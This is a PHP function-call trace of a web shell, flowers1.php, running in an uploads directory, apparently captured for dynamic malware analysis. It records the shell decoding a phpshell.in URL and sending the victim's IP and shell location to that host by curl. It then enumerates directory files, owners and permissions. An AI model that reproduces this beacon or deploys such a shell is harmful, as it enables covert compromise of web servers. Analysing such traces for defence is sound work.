4 208 0 0.039715 1008232 base64_encode 0 /var/www/html/uploads/flowers1.php 722 1 '/var/www/html/uploads'
4 208 1 0.039730 1008328
4 208 R 'L3Zhci93d3cvaHRtbC91cGxvYWRz'
4 209 0 0.039938 1015976 base64_decode 0 /var/www/html/uploads/flowers1.php 1079 1 'aHR0cDovL3BocHNoZWxsLmluL2wt'
4 209 1 0.039955 1016064
4 209 R 'http://phpshell.in/l-'
4 210 0 0.039971 1016032 GetIP 1 /var/www/html/uploads/flowers1.php 1079 0
5 211 0 0.039983 1016032 getenv 0 /var/www/html/uploads/flowers1.php 1073 1 'HTTP_CLIENT_IP'
5 211 1 0.039997 1016064
5 211 R FALSE
5 212 0 0.040011 1016032 getenv 0 /var/www/html/uploads/flowers1.php 1074 1 'HTTP_X_FORWARDED_FOR'
5 212 1 0.040025 1016064
5 212 R FALSE
5 213 0 0.040039 1016032 getenv 0 /var/www/html/uploads/flowers1.php 1077 1 'REMOTE_ADDR'
5 213 1 0.040053 1016104
5 213 R '127.0.0.1'
4 A /var/www/html/uploads/flowers1.php 1077 $ip = '127.0.0.1'
4 210 1 0.040079 1016072
4 210 R '127.0.0.1'
4 214 0 0.040094 1016096 base64_encode 0 /var/www/html/uploads/flowers1.php 1079 1 'http://localhost/uploads/flowers1.php'
4 214 1 0.040108 1016224
4 214 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Zsb3dlcnMxLnBocA=='
3 A /var/www/html/uploads/flowers1.php 1079 $x = 'http://phpshell.in/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Zsb3dlcnMxLnBocA=='
4 215 0 0.040142 1016088 function_exists 0 /var/www/html/uploads/flowers1.php 1080 1 'curl_init'
4 215 1 0.040156 1016128
4 215 R TRUE
4 216 0 0.040169 1016088 curl_init 0 /var/www/html/uploads/flowers1.php 1080 0
4 216 1 0.040189 1017000
4 216 R resource(27) of type (curl)
3 A /var/www/html/uploads/flowers1.php 1080 $ch = resource(27) of type (curl)
4 217 0 0.040216 1017000 curl_setopt 0 /var/www/html/uploads/flowers1.php 1081 3 resource(27) of type (curl) 10002 'http://phpshell.in/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Zsb3dlcnMxLnBocA=='
4 217 1 0.040237 1017096
4 217 R TRUE
4 218 0 0.040251 1017000 curl_setopt 0 /var/www/html/uploads/flowers1.php 1082 3 resource(27) of type (curl) 19913 TRUE
4 218 1 0.040267 1017096
4 218 R TRUE
4 219 0 0.040280 1017000 curl_exec 0 /var/www/html/uploads/flowers1.php 1083 1 resource(27) of type (curl)
4 219 1 0.192561 1017288
4 219 R '<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n'
3 A /var/www/html/uploads/flowers1.php 1083 $gitt = '<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n'
4 220 0 0.192646 1017256 curl_close 0 /var/www/html/uploads/flowers1.php 1084 1 resource(27) of type (curl)
4 220 1 0.192710 1016400
4 220 R NULL
4 221 0 0.192759 1016368 htmlspecialchars 0 /var/www/html/uploads/flowers1.php 1147 1 '/var/www/html/uploads/'
4 221 1 0.192776 1016560
4 221 R '/var/www/html/uploads/'
3 26 1 0.192795 1014400
3 222 0 0.192824 1014400 scandir 0 /var/www/html/uploads/flowers1.php 1319 1 '/var/www/html/uploads/'
3 222 1 0.192886 1015024
3 222 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'flowers1.php', 5 => 'prepend.php']
2 A /var/www/html/uploads/flowers1.php 1319 $dirContent = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'flowers1.php', 5 => 'prepend.php']
2 A /var/www/html/uploads/flowers1.php 1324 $sort = [0 => 'name', 1 => 1]
2 A /var/www/html/uploads/flowers1.php 1329 $files = []
2 A /var/www/html/uploads/flowers1.php 1329 $dirs = []
2 A /var/www/html/uploads/flowers1.php 1330 $n = 6
2 A /var/www/html/uploads/flowers1.php 1331 $i = 0
3 223 0 0.192994 1015016 fileowner 0 /var/www/html/uploads/flowers1.php 1333 1 '.'
3 223 1 0.193010 1015064
3 223 R 0
3 224 0 0.193024 1015024 posix_getpwuid 0 /var/www/html/uploads/flowers1.php 1333 1 0
3 224 1 0.193054 1015824
3 224 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/flowers1.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 225 0 0.193096 1015792 filegroup 0 /var/www/html/uploads/flowers1.php 1334 1 '.'
3 225 1 0.193109 1015832
3 225 R 0
3 226 0 0.193122 1015792 posix_getgrgid 0 /var/www/html/uploads/flowers1.php 1334 1 0
3 226 1 0.193146 1016448
3 226 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/flowers1.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 227 0 0.193181 1016888 filemtime 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/.'
3 227 1 0.193197 1016944
3 227 R 1676248343
3 228 0 0.193210 1016856 date 0 /var/www/html/uploads/flowers1.php 1335 2 'Y-m-d H:i:s' 1676248343
3 228 1 0.193274 1019248
3 228 R '2023-02-12 19:32:23'
3 229 0 0.193292 1019224 yemenPermsColor 1 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/.'
4 230 0 0.193306 1019224 is_readable 0 /var/www/html/uploads/flowers1.php 1299 1 '/var/www/html/uploads/.'
4 230 1 0.193323 1019264
4 230 R TRUE
4 231 0 0.193337 1019224 is_writable 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/.'
4 231 1 0.193352 1019264
4 231 R TRUE
4 232 0 0.193366 1019224 fileperms 0 /var/www/html/uploads/flowers1.php 1301 1 '/var/www/html/uploads/.'
4 232 1 0.193379 1019264
4 232 R 16895
4 233 0 0.193392 1019224 yemenPerms 1 /var/www/html/uploads/flowers1.php 1301 1 16895
4 A /var/www/html/uploads/flowers1.php 1285 $i = 'd'
4 A /var/www/html/uploads/flowers1.php 1289 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1290 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1291 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1292 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1293 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1294 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1295 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1296 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1297 $i .= 'x'
4 233 1 0.193502 1019264
4 233 R 'drwxrwxrwx'
3 229 1 0.193517 1019288
3 229 R '<font color=#25ff00>drwxrwxrwx</font>'
3 234 0 0.193534 1019288 filesize 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/.'
3 234 1 0.193547 1019328
3 234 R 4096
2 A /var/www/html/uploads/flowers1.php 1335 $tmp = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3 235 0 0.193583 1019288 is_file 0 /var/www/html/uploads/flowers1.php 1336 1 '/var/www/html/uploads/.'
3 235 1 0.193596 1019328
3 235 R FALSE
3 236 0 0.193610 1019288 is_link 0 /var/www/html/uploads/flowers1.php 1337 1 '/var/www/html/uploads/.'
3 236 1 0.193625 1019352
3 236 R FALSE
3 237 0 0.193639 1019312 is_dir 0 /var/www/html/uploads/flowers1.php 1338 1 '/var/www/html/uploads/.'
3 237 1 0.193652 1019352
3 237 R TRUE
2 A /var/www/html/uploads/flowers1.php 1333 $i++
3 238 0 0.193676 1019264 fileowner 0 /var/www/html/uploads/flowers1.php 1333 1 '..'
3 238 1 0.193690 1019288
3 238 R 0
3 239 0 0.193702 1019248 posix_getpwuid 0 /var/www/html/uploads/flowers1.php 1333 1 0
3 239 1 0.193731 1020048
3 239 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/flowers1.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 240 0 0.193773 1019280 filegroup 0 /var/www/html/uploads/flowers1.php 1334 1 '..'
3 240 1 0.193786 1019320
3 240 R 0
3 241 0 0.193799 1019280 posix_getgrgid 0 /var/www/html/uploads/flowers1.php 1334 1 0
3 241 1 0.193820 1019936
3 241 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/flowers1.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 242 0 0.193855 1019800 filemtime 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/..'
3 242 1 0.193870 1019864
3 242 R 1676248343
3 243 0 0.193883 1019768 date 0 /var/www/html/uploads/flowers1.php 1335 2 'Y-m-d H:i:s' 1676248343
3 243 1 0.193915 1020096
3 243 R '2023-02-12 19:32:23'
3 244 0 0.193929 1020080 yemenPermsColor 1 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/..'
4 245 0 0.193943 1020080 is_readable 0 /var/www/html/uploads/flowers1.php 1299 1 '/var/www/html/uploads/..'
4 245 1 0.193958 1020120
4 245 R TRUE
4 246 0 0.193971 1020080 is_writable 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/..'
4 246 1 0.193985 1020120
4 246 R TRUE
4 247 0 0.193998 1020080 fileperms 0 /var/www/html/uploads/flowers1.php 1301 1 '/var/www/html/uploads/..'
4 247 1 0.194011 1020120
4 247 R 16895
4 248 0 0.194024 1020080 yemenPerms 1 /var/www/html/uploads/flowers1.php 1301 1 16895
4 A /var/www/html/uploads/flowers1.php 1285 $i = 'd'
4 A /var/www/html/uploads/flowers1.php 1289 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1290 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1291 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1292 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1293 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1294 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1295 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1296 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1297 $i .= 'x'
4 248 1 0.194132 1020120
4 248 R 'drwxrwxrwx'
3 244 1 0.194146 1020144
3 244 R '<font color=#25ff00>drwxrwxrwx</font>'
3 249 0 0.194162 1020144 filesize 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/..'
3 249 1 0.194175 1020184
3 249 R 4096
2 A /var/www/html/uploads/flowers1.php 1335 $tmp = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3 250 0 0.194210 1019336 is_file 0 /var/www/html/uploads/flowers1.php 1336 1 '/var/www/html/uploads/..'
3 250 1 0.194224 1019376
3 250 R FALSE
3 251 0 0.194237 1019336 is_link 0 /var/www/html/uploads/flowers1.php 1337 1 '/var/www/html/uploads/..'
3 251 1 0.194252 1019384
3 251 R FALSE
3 252 0 0.194265 1019344 is_dir 0 /var/www/html/uploads/flowers1.php 1338 1 '/var/www/html/uploads/..'
3 252 1 0.194278 1019384
3 252 R TRUE
3 253 0 0.194291 1019288 array_merge 0 /var/www/html/uploads/flowers1.php 1338 2 ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] ['type' => 'dir']
3 253 1 0.194315 1019728
3 253 R ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/flowers1.php 1338 $dirs[] = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/flowers1.php 1333 $i++
3 254 0 0.194372 1020040 fileowner 0 /var/www/html/uploads/flowers1.php 1333 1 '.htaccess'
3 254 1 0.194387 1020064
3 254 R 0
3 255 0 0.194399 1020024 posix_getpwuid 0 /var/www/html/uploads/flowers1.php 1333 1 0
3 255 1 0.194422 1020824
3 255 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/flowers1.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 256 0 0.194467 1020056 filegroup 0 /var/www/html/uploads/flowers1.php 1334 1 '.htaccess'
3 256 1 0.194480 1020096
3 256 R 0
3 257 0 0.194493 1020056 posix_getgrgid 0 /var/www/html/uploads/flowers1.php 1334 1 0
3 257 1 0.194514 1020712
3 257 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/flowers1.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 258 0 0.194549 1020576 filemtime 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/.htaccess'
3 258 1 0.194565 1020632
3 258 R 1676248343
3 259 0 0.194578 1020536 date 0 /var/www/html/uploads/flowers1.php 1335 2 'Y-m-d H:i:s' 1676248343
3 259 1 0.194609 1020864
3 259 R '2023-02-12 19:32:23'
3 260 0 0.194624 1020848 yemenPermsColor 1 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/.htaccess'
4 261 0 0.194637 1020848 is_readable 0 /var/www/html/uploads/flowers1.php 1299 1 '/var/www/html/uploads/.htaccess'
4 261 1 0.194653 1020888
4 261 R TRUE
4 262 0 0.194666 1020848 is_writable 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/.htaccess'
4 262 1 0.194681 1020888
4 262 R FALSE
4 263 0 0.194695 1020848 fileperms 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/.htaccess'
4 263 1 0.194708 1020888
4 263 R 33188
4 264 0 0.194720 1020848 yemenPerms 1 /var/www/html/uploads/flowers1.php 1300 1 33188
4 A /var/www/html/uploads/flowers1.php 1283 $i = '-'
4 A /var/www/html/uploads/flowers1.php 1289 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1290 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1291 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1292 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1293 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1294 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1295 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1296 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1297 $i .= '-'
4 264 1 0.194828 1020888
4 264 R '-rw-r--r--'
3 260 1 0.194843 1020912
3 260 R '<font color=white>-rw-r--r--</font>'
3 265 0 0.194858 1020912 filesize 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/.htaccess'
3 265 1 0.194872 1020952
3 265 R 64
2 A /var/www/html/uploads/flowers1.php 1335 $tmp = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']
3 266 0 0.194906 1020536 is_file 0 /var/www/html/uploads/flowers1.php 1336 1 '/var/www/html/uploads/.htaccess'
3 266 1 0.194920 1020576
3 266 R TRUE
3 267 0 0.194932 1020480 array_merge 0 /var/www/html/uploads/flowers1.php 1336 2 ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root'] ['type' => 'file']
3 267 1 0.194955 1020920
3 267 R ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/flowers1.php 1336 $files[] = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2 A /var/www/html/uploads/flowers1.php 1333 $i++
3 268 0 0.195011 1021232 fileowner 0 /var/www/html/uploads/flowers1.php 1333 1 'data'
3 268 1 0.195026 1021248
3 268 R 0
3 269 0 0.195038 1021208 posix_getpwuid 0 /var/www/html/uploads/flowers1.php 1333 1 0
3 269 1 0.195061 1022008
3 269 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/flowers1.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 270 0 0.195101 1021240 filegroup 0 /var/www/html/uploads/flowers1.php 1334 1 'data'
3 270 1 0.195114 1021280
3 270 R 0
3 271 0 0.195126 1021240 posix_getgrgid 0 /var/www/html/uploads/flowers1.php 1334 1 0
3 271 1 0.195153 1021896
3 271 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/flowers1.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 272 0 0.195188 1021760 filemtime 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/data'
3 272 1 0.195203 1021824
3 272 R 1676248343
3 273 0 0.195232 1021728 date 0 /var/www/html/uploads/flowers1.php 1335 2 'Y-m-d H:i:s' 1676248343
3 273 1 0.195285 1022056
3 273 R '2023-02-12 19:32:23'
3 274 0 0.195313 1022040 yemenPermsColor 1 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/data'
4 275 0 0.195326 1022040 is_readable 0 /var/www/html/uploads/flowers1.php 1299 1 '/var/www/html/uploads/data'
4 275 1 0.195342 1022080
4 275 R TRUE
4 276 0 0.195355 1022040 is_writable 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/data'
4 276 1 0.195373 1022080
4 276 R TRUE
4 277 0 0.195386 1022040 fileperms 0 /var/www/html/uploads/flowers1.php 1301 1 '/var/www/html/uploads/data'
4 277 1 0.195398 1022080
4 277 R 16895
4 278 0 0.195411 1022040 yemenPerms 1 /var/www/html/uploads/flowers1.php 1301 1 16895
4 A /var/www/html/uploads/flowers1.php 1285 $i = 'd'
4 A /var/www/html/uploads/flowers1.php 1289 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1290 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1291 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1292 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1293 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1294 $i .= 'x'
4 A /var/www/html/uploads/flowers1.php 1295 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1296 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1297 $i .= 'x'
4 278 1 0.195538 1022080
4 278 R 'drwxrwxrwx'
3 274 1 0.195553 1022104
3 274 R '<font color=#25ff00>drwxrwxrwx</font>'
3 279 0 0.195569 1022104 filesize 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/data'
3 279 1 0.195583 1022144
3 279 R 4096
2 A /var/www/html/uploads/flowers1.php 1335 $tmp = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
3 280 0 0.195631 1021728 is_file 0 /var/www/html/uploads/flowers1.php 1336 1 '/var/www/html/uploads/data'
3 280 1 0.195645 1021768
3 280 R FALSE
3 281 0 0.195658 1021728 is_link 0 /var/www/html/uploads/flowers1.php 1337 1 '/var/www/html/uploads/data'
3 281 1 0.195673 1021768
3 281 R FALSE
3 282 0 0.195687 1021728 is_dir 0 /var/www/html/uploads/flowers1.php 1338 1 '/var/www/html/uploads/data'
3 282 1 0.195699 1021768
3 282 R TRUE
3 283 0 0.195712 1021672 array_merge 0 /var/www/html/uploads/flowers1.php 1338 2 ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root'] ['type' => 'dir']
3 283 1 0.195761 1022112
3 283 R ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/flowers1.php 1338 $dirs[] = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2 A /var/www/html/uploads/flowers1.php 1333 $i++
3 284 0 0.195833 1022048 fileowner 0 /var/www/html/uploads/flowers1.php 1333 1 'flowers1.php'
3 284 1 0.195849 1022072
3 284 R 1000
3 285 0 0.195862 1022032 posix_getpwuid 0 /var/www/html/uploads/flowers1.php 1333 1 1000
3 285 1 0.195894 1022848
3 285 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/flowers1.php 1333 $ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 286 0 0.195936 1022080 filegroup 0 /var/www/html/uploads/flowers1.php 1334 1 'flowers1.php'
3 286 1 0.195949 1022120
3 286 R 1000
3 287 0 0.195962 1022080 posix_getgrgid 0 /var/www/html/uploads/flowers1.php 1334 1 1000
3 287 1 0.195993 1022736
3 287 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 A /var/www/html/uploads/flowers1.php 1334 $gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 288 0 0.196032 1022616 filemtime 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/flowers1.php'
3 288 1 0.196047 1022680
3 288 R 1676248343
3 289 0 0.196061 1022576 date 0 /var/www/html/uploads/flowers1.php 1335 2 'Y-m-d H:i:s' 1676248343
3 289 1 0.196092 1022904
3 289 R '2023-02-12 19:32:23'
3 290 0 0.196106 1022896 yemenPermsColor 1 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/flowers1.php'
4 291 0 0.196119 1022896 is_readable 0 /var/www/html/uploads/flowers1.php 1299 1 '/var/www/html/uploads/flowers1.php'
4 291 1 0.196134 1022936
4 291 R TRUE
4 292 0 0.196147 1022896 is_writable 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/flowers1.php'
4 292 1 0.196163 1022936
4 292 R FALSE
4 293 0 0.196176 1022896 fileperms 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/flowers1.php'
4 293 1 0.196188 1022936
4 293 R 33204
4 294 0 0.196201 1022896 yemenPerms 1 /var/www/html/uploads/flowers1.php 1300 1 33204
4 A /var/www/html/uploads/flowers1.php 1283 $i = '-'
4 A /var/www/html/uploads/flowers1.php 1289 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1290 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1291 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1292 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1293 $i .= 'w'
4 A /var/www/html/uploads/flowers1.php 1294 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1295 $i .= 'r'
4 A /var/www/html/uploads/flowers1.php 1296 $i .= '-'
4 A /var/www/html/uploads/flowers1.php 1297 $i .= '-'
4 294 1 0.196310 1022936
4 294 R '-rw-rw-r--'
3 290 1 0.196324 1022960
3 290 R '<font color=white>-rw-rw-r--</font>'
3 295 0 0.196340 1022960 filesize 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/flowers1.php'
3 295 1 0.196352 1023000
3 295 R 100449
2 A /var/www/html/uploads/flowers1.php 1335 $tmp = ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes']
3 296 0 0.196388 1022584 is_file 0 /var/www/html/uploads/flowers1.php 1336 1 '/var/www/html/uploads/flowers1.php'
3 296 1 0.196400 1022624
3 296 R TRUE
3 297 0 0.196413 1022520 array_merge 0 /var/www/html/uploads/flowers1.php 1336 2 ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes'] ['type' => 'file']
3 297 1 0.196436 1022960
3 297 R ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2 A /var/www/html/uploads/flowers1.php 1336 $files[] = ['name' => 'flowers1.php', 'path' => '/var/www/html/uploads/flowers1.php', 'modify' => '2023-02-12 19:32:23', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 100449, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2 A /var/www/html/uploads/flowers1.php 1333 $i++
3 298 0 0.196492 1022896 fileowner 0 /var/www/html/uploads/flowers1.php 1333 1 'prepend.php'
3 298 1 0.196507 1022912
3 298 R 0
3 299 0 0.196520 1022872 posix_getpwuid 0 /var/www/html/uploads/flowers1.php 1333 1 0
3 299 1 0.196562 1023672
3 299 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/flowers1.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 300 0 0.196604 1022888 filegroup 0 /var/www/html/uploads/flowers1.php 1334 1 'prepend.php'
3 300 1 0.196617 1022928
3 300 R 0
3 301 0 0.196630 1022888 posix_getgrgid 0 /var/www/html/uploads/flowers1.php 1334 1 0
3 301 1 0.196654 1023544
3 301 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/flowers1.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 302 0 0.196702 1023424 filemtime 0 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/prepend.php'
3 302 1 0.196718 1023488
3 302 R 1676248343
3 303 0 0.196731 1023384 date 0 /var/www/html/uploads/flowers1.php 1335 2 'Y-m-d H:i:s' 1676248343
3 303 1 0.196762 1023712
3 303 R '2023-02-12 19:32:23'
3 304 0 0.196781 1023704 yemenPermsColor 1 /var/www/html/uploads/flowers1.php 1335 1 '/var/www/html/uploads/prepend.php'
4 305 0 0.196795 1023704 is_readable 0 /var/www/html/uploads/flowers1.php 1299 1 '/var/www/html/uploads/prepend.php'
4 305 1 0.196811 1023744
4 305 R TRUE
4 306 0 0.196824 1023704 is_writable 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/prepend.php'
4 306 1 0.196839 1023744
4 306 R FALSE
4 307 0 0.196852 1023704 fileperms 0 /var/www/html/uploads/flowers1.php 1300 1 '/var/www/html/uploads/prepend.php'
4 307 1 0.196866 1023744
4 307 R 33261
4 308 0 0.196879 1023704 yemenPerms 1 /var/www/html/uploads/flowers1.php 1300 1 33261
